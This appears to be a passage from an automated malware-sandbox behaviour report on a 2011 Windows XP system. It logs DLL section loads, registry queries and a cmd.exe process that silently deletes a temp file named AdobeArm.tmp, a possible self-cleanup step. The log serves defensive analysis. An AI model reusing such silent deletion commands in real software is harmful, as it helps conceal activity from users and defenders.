Section loaded	Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 20D0000 Size: 262144 Protection: read write Mapped to pid: own pid	success or wait	2098182892
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2210000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	2098287844
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 2210000 Size: 180224 Protection: readonly Mapped to pid: own pid	success or wait	2098290408
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2210000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	2098292920
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 2210000 Size: 180224 Protection: readonly Mapped to pid: own pid	success or wait	2098294474
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 2210000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	2098295521
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2220000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	2098296872
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid	success or wait	2098298222

Analysis File: cmd.exe PID: 2172 Parent PID: 4076

+ Sections

+ General
Start time:	05:26:00
Start date:	02/12/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp > nul
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

File Activities:

+ File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	read attributes and delete	non directory file and open for backup ident and open reparse point		success or wait	1	4AD17D07
nul	read attributes and synchronize and generic write	synchronous io non alert and non directory file	true	success or wait	1	4AD02F12

+ File deleted
File Path	Completion	Count	Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	success or wait	1	4AD17D07

Section Activities:

+ Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	unknown	7C800000	1007616	own pid	read write	success or wait	1
none	query and write and read and execute and extend size	reserve	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	unknown	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	unknown	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	unknown	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	unknown	330000	24576	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\KnownDlls\msvcrt.dll	write and read and execute	unknown	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	unknown	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ShimEng.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	object name not found	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	unknown	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	unknown	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\WINMM.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	object name not found	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	unknown	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	unknown	77120000	569344	own pid	read write	success or wait	1
\KnownDlls\MSACM32.dll	write and read and execute	unknown	77120000	569344	own pid	read write	object name not found	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	unknown	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	unknown	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	success or wait	1
\KnownDlls\UxTheme.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	object name not found	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	unknown	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	read	commit	440000	4096	own pid	readonly	success or wait	1
\KnownDlls\comctl32.dll	write and read and execute	unknown	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Registry Activities:

+ Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	object name not found	1	4AD04BB8

Memory Activities:

+ Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
2172	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

+ Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2161835647
Section loaded	Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2161842354
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2161845802
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2161850238
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2161851060
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	2161851803
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2161854120
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2161854493
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	2161976321
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	2161982797
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	2161983673
Section loaded	Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	object name not found	2161995868
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	2161997605
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	2162008178
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	2162025116
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	2162028464
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	2162030554
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	2162038932
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	2162044570
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	2162060001
Section loaded	Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	object name not found	2162069468
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	2162070927
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	2162077222
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	2162086190
Section loaded	Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	object name not found	2162093016
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	2162094483
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	2162104555
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	2162108309
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	2162120418
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	2162134208
Section loaded	Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	object name not found	2162140473
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	2162141939
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2162156971
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2163228301
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2163230654
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	2163232801
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	2163369502
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	2163505470
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	2163509670
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	2163522384
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2163526194
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2163528521
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	2163566298
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	2163580787
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	2163616827
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	2163617403
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	2163617923
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	2163618384
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	2163618911
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	success or wait	2163619427
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	success or wait	2163619940
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	2163620634
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	2163621359
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	2163621881
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	2163622398
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	2163622910
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	object name not found	2163623423
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	object name not found	2163623935
Memory allocated	PID: 2172 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	2163627822
File opened	Path: nul Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true	success or wait	2163638767
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point	success or wait	2163648284
File deleted	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp	success or wait	2163649298